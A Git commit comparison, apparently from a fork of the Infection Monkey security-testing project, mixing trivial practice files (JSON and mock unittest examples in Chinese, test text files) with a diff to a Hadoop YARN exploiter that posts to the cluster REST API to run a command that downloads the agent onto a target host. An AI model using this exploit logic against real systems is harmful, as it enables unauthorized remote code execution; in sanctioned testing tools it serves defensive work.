Update README.md

11222223333
测试1111111111
2022-10-12 13:27:11 +08:00 · 2022-10-11 15:35:25 +08:00 · 2022-10-11 14:38:05 +08:00 · 2022-10-11 14:37:24 +08:00 · 2022-10-11 14:37:03 +08:00 · 2022-10-11 14:01:23 +08:00
11 changed files with 144 additions and 19 deletions
--- a/README.md
+++ b/README.md
@ -29,7 +29,7 @@ Monkey on our [website](https://www.akamai.com/infectionmonkey).
 For more information, or to apply, see the official job post:
  - [Israel](https://akamaicareers.inflightcloud.com/jobdetails/aka_ext/028224?section=aka_ext&job=028224)

-
+test1111

 ## Screenshots

--- a/c/test_dumps.py
+++ b/c/test_dumps.py
@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)
--- a/ces.txt
+++ b/ces.txt
@ -0,0 +1 @@
+是分为氛围
--- a/ces11.txt
+++ b/ces11.txt
@ -0,0 +1 @@
+123456
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@ -5,13 +5,20 @@
 """

 import json
+import logging
 import posixpath
 import random
 import string
+from time import time

 import requests

 from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
+from common.tags import (
+    T1105_ATTACK_TECHNIQUE_TAG,
+    T1203_ATTACK_TECHNIQUE_TAG,
+    T1210_ATTACK_TECHNIQUE_TAG,
+)
 from infection_monkey.exploit.tools.helpers import get_agent_dst_path
 from infection_monkey.exploit.tools.http_tools import HTTPTools
 from infection_monkey.exploit.web_rce import WebRCE
@ -23,6 +30,10 @@ from infection_monkey.model import (
 )
 from infection_monkey.utils.commands import build_monkey_commandline

+logger = logging.getLogger(__name__)
+
+HADOOP_EXPLOITER_TAG = "hadoop-exploiter"
+

 class HadoopExploiter(WebRCE):
    _EXPLOITED_SERVICE = "Hadoop"
@ -32,39 +43,43 @@ class HadoopExploiter(WebRCE):
    # Random string's length that's used for creating unique app name
    RAN_STR_LEN = 6

+    _EXPLOITER_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
+
+    _PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
+
    def __init__(self):
        super(HadoopExploiter, self).__init__()

    def _exploit_host(self):
-        # Try to get exploitable url
-        urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
-        self.add_vulnerable_urls(urls, True)
-        if not self.vulnerable_urls:
+        # Try to get potential urls
+        potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
+        if not potential_urls:
+            self.exploit_result.error_message = (
+                f"No potential exploitable urls has been found for {self.host}"
+            )
            return self.exploit_result

-        try:
        monkey_path_on_victim = get_agent_dst_path(self.host)
-        except KeyError:
-            return self.exploit_result

        http_path, http_thread = HTTPTools.create_locked_transfer(
            self.host, str(monkey_path_on_victim), self.agent_binary_repository
        )

-        try:
        command = self._build_command(monkey_path_on_victim, http_path)
-
-            if self.exploit(self.vulnerable_urls[0], command):
+        try:
+            for url in potential_urls:
+                if self.exploit(url, command):
                    self.add_executed_cmd(command)
                    self.exploit_result.exploitation_success = True
                    self.exploit_result.propagation_success = True
+                    break
        finally:
            http_thread.join(self.DOWNLOAD_TIMEOUT)
            http_thread.stop()

        return self.exploit_result

-    def exploit(self, url, command):
+    def exploit(self, url: str, command: str):
        if self._is_interrupted():
            self._set_interrupted()
            return False
@ -73,8 +88,8 @@ class HadoopExploiter(WebRCE):
        resp = requests.post(
            posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
        )
-        resp = json.loads(resp.content)
-        app_id = resp["application-id"]
+        resp_dict = json.loads(resp.content)
+        app_id = resp_dict["application-id"]

        # Create a random name for our application in YARN
        # random.SystemRandom can block indefinitely in Linux
@ -87,10 +102,16 @@ class HadoopExploiter(WebRCE):
            self._set_interrupted()
            return False

+        timestamp = time()
        resp = requests.post(
            posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
        )
-        return resp.status_code == 202
+
+        success = resp.status_code == 202
+        message = "" if success else f"Failed to exploit via {url}"
+        self._publish_exploitation_event(timestamp, success, error_message=message)
+        self._publish_propagation_event(timestamp, success, error_message=message)
+        return success

    def check_if_exploitable(self, url):
        try:
--- a/test009.txt
+++ b/test009.txt
--- a/13
+++ b/13
@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)
--- a/test_dumps.py
+++ b/test_dumps.py
@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)
--- a/zmtest04/test_mock.py
+++ b/zmtest04/test_mock.py
@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)
--- a/副本/test_mock.py
+++ b/副本/test_mock.py
@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)
--- a/zmtest05/test_mock.py
+++ b/zmtest05/test_mock.py
@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)
Author	SHA1	Message	Date
p34709852	994f7de8e3	Update README.md	2022-10-12 13:27:11 +08:00
wutao	dedde27c8c	11222223333	2022-10-11 15:35:25 +08:00
wutao	1d0f3c8e50	测试1111111111	2022-10-11 14:38:05 +08:00
wutao	25054d8479	Merge branch 'develop' of http://111.8.36.180:3000/p15670423/monkey into develop	2022-10-11 14:37:24 +08:00
wutao	5273769ca7	测试	2022-10-11 14:37:03 +08:00
p15670423	c4b2f4d171	Delete 'test_dumps03.py'	2022-10-11 14:01:23 +08:00
p15670423	bfe3e6da58	Delete 'test_dumps01.py'	2022-10-11 14:01:10 +08:00
p15670423	dbab067af5	Delete 'test03.txt'	2022-10-11 14:00:54 +08:00
p15670423	453dd67e03	Delete 'requirements.txt'	2022-10-11 14:00:45 +08:00
p15670423	386bbf84b2	ddfyas ysdf Co-authored-by: p15670423 <p15670423@example.org> Co-committed-by: p15670423 <p15670423@example.org>	2022-10-11 14:00:25 +08:00
p15670423	4cd9fd289e	Delete 'test_dumps03.py'	2022-10-11 13:59:36 +08:00
p15670423	ffdf699f32	Delete 'test_dumps01.py'	2022-10-11 13:59:26 +08:00
p15670423	036742925c	Delete 'test03.txt'	2022-10-11 13:59:16 +08:00
p15670423	017d109a77	Delete 'requirements.txt'	2022-10-11 13:58:46 +08:00
p15670423	14ea13c6ee	ces ceees Co-authored-by: p15670423 <p15670423@example.org> Co-committed-by: p15670423 <p15670423@example.org>	2022-10-11 13:56:30 +08:00
p15670423	00034313b1	Delete 'test03.txt'	2022-10-11 13:55:26 +08:00
p34709852	bef6e2c37f	ADD file via upload	2022-10-11 13:50:14 +08:00
p34709852	f10c9f7e29	Delete 'requirements.txt'	2022-10-11 13:48:45 +08:00
p34709852	b0d3201186	Delete 'test_dumps03.py'	2022-10-11 13:47:11 +08:00
p15670423	73cc1994d9	Update test_dumps03.py	2022-10-11 13:42:14 +08:00
p15670423	9208f6691d	Update requirements.txt	2022-10-11 13:41:56 +08:00
p15670423	73a326a3e3	no-ff no-ff方式。。。。。。。。。。。	2022-10-11 13:30:17 +08:00
p15670423	4188bb507c	Update test_dumps03.py	2022-10-11 13:30:17 +08:00
p34709852	7985a6b07f	Add requirements.txt	2022-10-11 13:30:17 +08:00
p34709852	c8859701c8	ADD file via upload	2022-10-11 13:30:17 +08:00
p34709852	880a2d68e8	Delete 'test_dumps01.py'	2022-10-11 13:28:20 +08:00
p34709852	a47ca4dac8	ADD file via upload	2022-10-11 11:36:11 +08:00
p15670423	f803f88afc	确认合并测试，，，，，，，，，，，，，，，，，，	2022-10-11 09:55:06 +08:00
p34709852	09b3b42dc5	ADD file via upload	2022-10-10 14:48:05 +08:00
p31829507	de18b55417	Add test_dumps.py	2022-10-10 14:39:32 +08:00
p31829507	9071fc90aa	Add test_dumps	2022-10-10 14:38:31 +08:00
wutao	4505399049	测试：重复提交代码	2022-10-10 13:40:54 +08:00
wutao	f5bfdc430c	测试：提交代码	2022-10-10 13:36:32 +08:00
wutao	0382831701	测试：提交代码	2022-10-10 13:34:44 +08:00
Mike Salvatore	04fec93c39	Merge branch '2269-publish-events-from-hadoop-exploiter' into develop PR #2396	2022-10-07 09:37:37 -04:00
Ilija Lazoroski	7a664218bd	Agent: Check all potential urls in Hadoop	2022-10-07 15:13:04 +02:00
Mike Salvatore	66f5d7a86a	Agent: Remove errant exploitation event from hadoop If no potential URLs are found, then no exploit is attempted, so there's no reason to publish an ExploitationEvent.	2022-10-07 08:35:24 -04:00
Ilija Lazoroski	25073be9f3	Agent: Remove adding vulnerable urls in Hadoop Adding vulnerable ulrs causes check to see if the target is exploitable which calls self.exploit	2022-10-07 11:46:35 +02:00
Ilija Lazoroski	c02d43556a	Agent: Make Hadoop tags uppercase	2022-10-07 11:46:35 +02:00
Ilija Lazoroski	8bdb30dcfb	Agent: Rename stamp to timestamp in Hadoop	2022-10-07 11:46:35 +02:00
Ilija Lazoroski	8f6df12d9c	Agent: Modify HadoopExploiter tags to be properties	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	76a3cb0ba0	Agent: Stamp time before exploit executes	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	de5d365bb0	Agent: Publish events sooner	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	3e592cfa69	Agent: Use exploiter tag properties	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	4a0a24dde2	Agent: Update hadoop exploiter tags T1570 -> T1105	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	76ae57281d	Agent: Use EXPLOIT_TAGS for exploitation event	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	54b551b728	Agent: Update tags for hadoop events	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	c31aed94ea	Agent: Move successful explotiation event publish	2022-10-07 11:46:35 +02:00
Kekoa Kaaikala	bee1047024	Agent: Update hadoop failed event publishing	2022-10-07 11:46:34 +02:00
Kekoa Kaaikala	57af640317	Agent: Use correct publish method names	2022-10-07 11:46:34 +02:00
Ilija Lazoroski	9c185a3a78	Agent: Add tags and error messages in Hadoop	2022-10-07 11:46:34 +02:00
Ilija Lazoroski	fe864792f3	Agent: Publish Propagation and Exploitation events from Hadoop	2022-10-07 11:46:34 +02:00